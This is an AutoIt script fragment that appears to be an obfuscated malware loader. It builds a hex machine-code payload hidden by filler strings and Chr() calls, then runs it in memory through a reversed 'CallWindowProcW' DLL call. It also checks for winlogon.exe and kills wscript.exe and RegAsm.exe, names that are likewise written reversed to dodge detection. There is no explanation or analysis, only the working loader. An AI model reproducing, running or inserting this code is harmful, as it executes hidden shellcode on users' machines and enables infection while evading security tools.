Chr(48) & "98NBIdfeZJgGGTHRLVB" & Chr(53) & "13C6" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLVANBIdfeZJgGGTHRLV3EE8NBIdfeZJgGGTHRLV" & Chr(48) & Chr(53) & Chr(48) & "3NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B3NBIdfeZJgGGTHRLV9" & Chr(48) & "3FA6ANBIdfeZJgGGTHRLV22ENBIdfeZJgGGTHRLV8FA" & Chr(48) & "2" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8NBIdfeZJgGGTHRLVB" & Chr(48) & "96NBIdfeZJgGGTHRLV8F8NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLVNBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(53) & "7" & Chr(53) & "1FFDNBIdfeZJgGGTHRLV" & Chr(48) & "6A" & Chr(48) & Chr(48) & "E8NBIdfeZJgGGTHRLVE8" & Chr(48) & "2" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "6888FENBIdfeZJgGGTHRLVB316" & Chr(53) & "NBIdfeZJgGGTHRLV1E814" & Chr(48) & "3NBIdfeZJgGGTHRLV" & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLVNBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "6ANBIdfeZJgGGTHRLV2EENBIdfeZJgGGTHRLV8D6" & Chr(48) & "NBIdfeZJgGGTHRLV2" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLVNBIdfeZJgGGTHRLV" & Chr(48) & "8BNBIdfeZJgGGTHRLV396A2AENBIdfeZJgGGTHRLV8CD" & Chr(48) & "2" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "8B116A42ENBIdfeZJgGGTHRLV8C4" & Chr(48) & "2" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(53) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV7NBIdfeZJgGGTHRLV" & Chr(53) & "2NBIdfeZJgGGTHRLV6A" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV6A" & Chr(48) & Chr(48) & "6NBIdfeZJgGGTHRLVA" & Chr(48) & "46A" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV6A" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "6A" & Chr(48) & Chr(48) & "6A" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "FF3NBIdfeZJgGGTHRLV1FFNBIdfeZJgGGTHRLVD" & Chr(48) & "6A1NBIdfeZJgGGTHRLV2E8" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLVNBIdfeZJgGGTHRLVA9" & Chr(48) & "2NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "68DNBIdfeZJgGGTHRLV" & Chr(48) & "371" & Chr(48) & "F2NBIdfeZJgGGTHRLV" & Chr(53) & "1E8DNBIdfeZJgGGTHRLV" & Chr(53) & Chr(48) & "2" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV6A22E897NBIdfeZJgGGTHRLV" & Chr(48) & "2" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV8B1" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV1NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLVA2EE88E" & Chr(48) & "2" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "8B" & Chr(48) & "NBIdfeZJgGGTHRLV9FF7234FF31FFD" & Chr(48) & "6A" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "E87E" & Chr(48) & "2NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "6" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV8NBIdfeZJgGGTHRLV9CNBIdfeZJgGGTHRLV9" & Chr(53) & "1A6ENBIdfeZJgGGTHRLV" & Chr(53) & "1E8AA" & Chr(48) & "2" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV6A22E86C" & Chr(48) & "2" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "8B118B3NBIdfeZJgGGTHRLV96A2" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLVENBIdfeZJgGGTHRLVE8NBIdfeZJgGGTHRLV61" & Chr(48) & "2" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B" & Chr(48) & "96A4" & Chr(48) & "68" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "3" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "FF72" & Chr(53) & Chr(48) & "FF7NBIdfeZJgGGTHRLV734FF31FNBIdfeZJgGGTHRLVFD" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & "6ANBIdfeZJgGGTHRLV36E847" & Chr(48) & "2NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8BD16ANBIdfeZJgGGTHRLV22E83E" & Chr(48) & "2" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "8B396ANBIdfeZJgGGTHRLV3EE83" & Chr(53) & Chr(48) & "2" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "8NBIdfeZJgGGTHRLVB316A22E82C" & Chr(48) & "2" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8BNBIdfeZJgGGTHRLV" & Chr(48) & "16A2EE823" & Chr(48) & "2" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B" & Chr(48) & "NBIdfeZJgGGTHRLV9" & Chr(53) & "2FF7" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV7" & Chr(53) & "4NBIdfeZJgGGTHRLV" & Chr(53) & "6FF7" & Chr(48) & "34FNBIdfeZJgGGTHRLVF316A" & Chr(48) & Chr(48) & "E81" & Chr(48) & Chr(48) & "2" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "68" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLVA16NBIdfeZJgGGTHRLVA3DD8" & Chr(53) & "1ENBIdfeZJgGGTHRLV83C" & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV2" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "83C4" & Chr(48) & "NBIdfeZJgGGTHRLVCFFD" & Chr(48) & "6A12E8F9" & Chr(48) & "1" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "68" & Chr(53) & "BE814CF" & Chr(53) & "1E82" & Chr(53) & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV2" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "6A22E8NBIdfeZJgGGTHRLVE7" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B1183CNBIdfeZJgGGTHRLV2" & Chr(48) & "66A3AE8DB" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "6A" & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV2" & Chr(53) & "NBIdfeZJgGGTHRLV2" & Chr(53) & "1FFD" & Chr(48) & "6ANBIdfeZJgGGTHRLV36E8CE" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "CNBIdfeZJgGGTHRLV7" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "B828" & Chr(48) & Chr(48) & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "6A36E8BCNBIdfeZJgGGTHRLV" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "F7216NBIdfeZJgGGTHRLVA1EE8B3" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B118B" & Chr(53) & "2" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV3C81C2F8" & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "3D" & Chr(48) & "6ANBIdfeZJgGGTHRLV3EE89F" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "311NBIdfeZJgGGTHRLV6A26E896" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "6A" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV28" & Chr(53) & "2FF316ANBIdfeZJgGGTHRLV12E88A" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "68" & Chr(53) & "BE814CF" & Chr(53) & "1E8B6" & Chr(48) & "1" & Chr(48) & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "83C4" & Chr(48) & "CFFNBIdfeZJgGGTHRLVD" & Chr(48) & "6A26E873" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B398B" & Chr(48) & "98B71146A3EE86" & Chr(53) & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV1" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "3316NBIdfeZJgGGTHRLVA26E8" & Chr(53) & "C" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B" & Chr(48) & "98B" & Chr(53) & "1" & Chr(48) & "C6A22E8" & Chr(53) & Chr(48) & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & "9" & Chr(48) & "3" & Chr(53) & "1346ANBIdfeZJgGGTHRLV46E844" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV8BC16A2EE8NBIdfeZJgGGTHRLV3B" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B" & Chr(48) & "9" & Chr(53) & Chr(48) & "FF77" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV1" & Chr(48) & Chr(53) & "6" & Chr(53) & "2FF31NBIdfeZJgGGTHRLV6A" & Chr(48) & Chr(48) & "E82A" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "68A16A" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV3DD8" & Chr(53) & "1E8" & Chr(53) & "6" & Chr(48) & "NBIdfeZJgGGTHRLV1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "83C4" & Chr(48) & "C" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLVFFD" & Chr(48) & "6NBIdfeZJgGGTHRLVA36E813NBIdfeZJgGGTHRLV" & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B1183" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLVC2" & Chr(48) & "18NBIdfeZJgGGTHRLV9116A3ANBIdfeZJgGGTHRLVE8" & Chr(48) & Chr(53) & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B" & Chr(48) & "9" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV3BCA" & Chr(48) & "NBIdfeZJgGGTHRLVF8" & Chr(53) & "33FFNBIdfeZJgGGTHRLVFFFF6A32E8F4" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV8B" & Chr(48) & "9NBIdfeZJgGGTHRLVC7" & Chr(48) & "1" & Chr(48) & "7NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "1" & Chr(48) & Chr(48) & "6A" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "E8E" & Chr(53) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "68D2CNBIdfeZJgGGTHRLV7A768" & Chr(53) & "NBIdfeZJgGGTHRLV1E" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV811" & Chr(48) & "NBIdfeZJgGGTHRLV1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV6A32E8D3" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B116A2EE8CA" & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "8NBIdfeZJgGGTHRLVB" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & "9NBIdfeZJgGGTHRLV" & Chr(53) & "2FF71" & Chr(48) & "NBIdfeZJgGGTHRLV4FFD" & Chr(48) & "6A22ENBIdfeZJgGGTHRLV8BB" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B3983C734NBIdfeZJgGGTHRLV6A32NBIdfeZJgGGTHRLVE8A" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLVF" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8BNBIdfeZJgGGTHRLV318BB6A4" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "83C6" & Chr(48) & "86A2EE89D" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B1" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV16NBIdfeZJgGGTHRLVA46E89NBIdfeZJgGGTHRLV4" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(53) & "16A" & Chr(48) & "NBIdfeZJgGGTHRLV4" & Chr(53) & "7" & Chr(53) & "6FF326A" & Chr(48) & Chr(48) & "E886" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "68A" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV16NBIdfeZJgGGTHRLVA3DD8" & Chr(53) & "1NBIdfeZJgGGTHRLVE8B2" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "83CNBIdfeZJgGGTHRLV4" & Chr(48) & "CFFD" & Chr(48) & "6A22E86FNBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B" & Chr(48) & "9" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV8NBIdfeZJgGGTHRLVBNBIdfeZJgGGTHRLV" & Chr(53) & "128" & Chr(48) & "3NBIdfeZJgGGTHRLV" & Chr(53) & "1346A32E86NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV8BNBIdfeZJgGGTHRLV" & Chr(48) & "981C1NBIdfeZJgGGTHRLVB" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "89NBIdfeZJgGGTHRLV116A" & Chr(48) & Chr(48) & "ENBIdfeZJgGGTHRLV8" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV4F" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV68D3C7A7E8NBIdfeZJgGGTHRLV" & Chr(53) & "1E87B" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "6A32E83D" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8BD1" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLVA2NBIdfeZJgGGTHRLVEE834" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B" & Chr(48) & "9NBIdfeZJgGGTHRLVFF32FF71" & Chr(48) & "4FFD" & Chr(48) & "6A" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLVE824NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "68" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV8NBIdfeZJgGGTHRLV83NBIdfeZJgGGTHRLVF4A9E" & Chr(53) & "1NBIdfeZJgGGTHRLVE8" & Chr(53) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "6A2EE812" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8BNBIdfeZJgGGTHRLV" & Chr(48) & "9FFNBIdfeZJgGGTHRLV71" & Chr(48) & "4FFD" & Chr(48) & "6" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLVANBIdfeZJgGGTHRLV4ANBIdfeZJgGGTHRLVE8" & Chr(48) & "4" & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "8B216NBIdfeZJgGGTHRLV1C38BCB" & Chr(48) & "34C24" & Chr(48) & "4C36NBIdfeZJgGGTHRLVA" & Chr(48) & Chr(48) & "E8NBIdfeZJgGGTHRLVF2FFFFFF" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLV8" & Chr(53) & "4NBIdfeZJgGGTHRLVCAAF91NBIdfeZJgGGTHRLV" & Chr(53) & "1E81E" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "6A4" & Chr(48) & "68" & Chr(48) & Chr(48) & "1" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "FF74241NBIdfeZJgGGTHRLV86A" & Chr(48) & Chr(48) & "F" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLVFNBIdfeZJgGGTHRLVD" & Chr(48) & "FFNBIdfeZJgGGTHRLV7424NBIdfeZJgGGTHRLV14E8CFFFFFNBIdfeZJgGGTHRLVFF89" & Chr(48) & "183C41" & Chr(48) & "C3ENBIdfeZJgGGTHRLV822" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "68A4" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV4NBIdfeZJgGGTHRLVE" & Chr(48) & "EENBIdfeZJgGGTHRLVC" & Chr(53) & Chr(48) & "E84NBIdfeZJgGGTHRLVB" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8NBIdfeZJgGGTHRLV3C4" & Chr(48) & "8FF7424NBIdfeZJgGGTHRLV" & Chr(48) & "4" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLVFNBIdfeZJgGGTHRLVFD" & Chr(48) & "FNBIdfeZJgGGTHRLVF7424NBIdfeZJgGGTHRLV" & Chr(48) & "8" & Chr(53) & Chr(48) & "E838" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "83C4" & Chr(48) & "NBIdfeZJgGGTHRLV8C3" & Chr(53) & Chr(53) & "NBIdfeZJgGGTHRLV" & Chr(53) & "2" & Chr(53) & "1" & Chr(53) & "3" & Chr(53) & "6" & Chr(53) & "733C" & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLV48B7NBIdfeZJgGGTHRLV" & Chr(48) & "3" & Chr(48) & "8BNBIdfeZJgGGTHRLV76" & Chr(48) & "C8B761CNBIdfeZJgGGTHRLV8B6E" & Chr(48) & "88B7NBIdfeZJgGGTHRLVE2" & Chr(48) & "8B3NBIdfeZJgGGTHRLV63847187" & Chr(53) & "F38" & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV3NBIdfeZJgGGTHRLVF6B7NBIdfeZJgGGTHRLV4" & Chr(48) & "78" & Chr(48) & "3FNBIdfeZJgGGTHRLV4B74" & Chr(48) & "2EBENBIdfeZJgGGTHRLV78BC" & Chr(53) & Chr(53) & "F" & Chr(53) & "ENBIdfeZJgGGTHRLV" & Chr(53) & "B" & Chr(53) & "9" & Chr(53) & "ANBIdfeZJgGGTHRLV" & Chr(53) & "DC3" & Chr(53) & Chr(53) & Chr(53) & "2NBIdfeZJgGGTHRLV" & Chr(53) & "1" & Chr(53) & "3" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(53) & "NBIdfeZJgGGTHRLV6" & Chr(53) & "78BNBIdfeZJgGGTHRLV6C241CNBIdfeZJgGGTHRLV8" & Chr(53) & "ED74438BNBIdfeZJgGGTHRLV4" & Chr(53) & "3C8B" & Chr(53) & "4NBIdfeZJgGGTHRLV2878" & Chr(48) & "3D" & Chr(53) & "8B4A1NBIdfeZJgGGTHRLV88B" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(53) & "NBIdfeZJgGGTHRLVA2" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV3DDE33" & Chr(48) & "498NBIdfeZJgGGTHRLVB348B" & Chr(48) & "3FNBIdfeZJgGGTHRLV" & Chr(53) & "33FF33NBIdfeZJgGGTHRLVC" & Chr(48) & "FCAC84C" & Chr(48) & "74" & Chr(48) & "NBIdfeZJgGGTHRLV7C1" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLVCNBIdfeZJgGGTHRLVF" & Chr(48) & "D" & Chr(48) & "NBIdfeZJgGGTHRLV3F8EBF43B7CNBIdfeZJgGGTHRLV242" & Chr(48) & "7" & Chr(53) & "E1NBIdfeZJgGGTHRLV8B" & Chr(53) & "A2NBIdfeZJgGGTHRLV4" & Chr(48) & "3DD668B" & Chr(48) & "C4B8B" & Chr(53) & "A1" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "C" & Chr(48) & "3NBIdfeZJgGGTHRLVDDNBIdfeZJgGGTHRLV8B" & Chr(48) & "48B" & Chr(48) & "3C" & Chr(53) & "NBIdfeZJgGGTHRLV" & Chr(53) & "F" & Chr(53) & "E" & Chr(53) & "B" & Chr(53) & "9" & Chr(53) & "NBIdfeZJgGGTHRLVA" & Chr(53) & "DC3CNBIdfeZJgGGTHRLV3" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH = StringReplace($NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH, "NBIdfeZJgGGTHRLV" , "") Local $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHH = DllStructCreate(StringReverse("[etyb") & BinaryLen($NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH) & "]") Local $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHR = DllStructCreate(StringReverse("[etyb") & BinaryLen($cIOcXbXYDeTefBPII) & "]") DllStructSetData($NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHH, 1, $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH) DllStructSetData($NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHR, 1, $cIOcXbXYDeTefBPII) If ProcessExists("winlogon.exe") Then DllCall("user32.dll", "int", StringReverse("WcorPwodniWllaC"), "ptr", DllStructGetPtr($NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHH), "wstr", ($NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZc), "ptr", DllStructGetPtr($NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHR), "int", 0, "int", 0) EndIf Sleep(600) If Not GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQUHB(StringReverse("exe.tpircsw")) = False Then WinKill(GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQUHB(StringReverse("exe.tpircsw"))) GgUIfbdZDaLMfMWIhAWeCPLXVBGX() EndIf If Not GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQUHB(StringReverse("exe.msAgeR")) = False Then WinKill(GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQUHB(StringReverse("exe.msAgeR"))) GgUIfbdZDaLMfMWIhAWeCPLXVBGX() EndIf EndFunc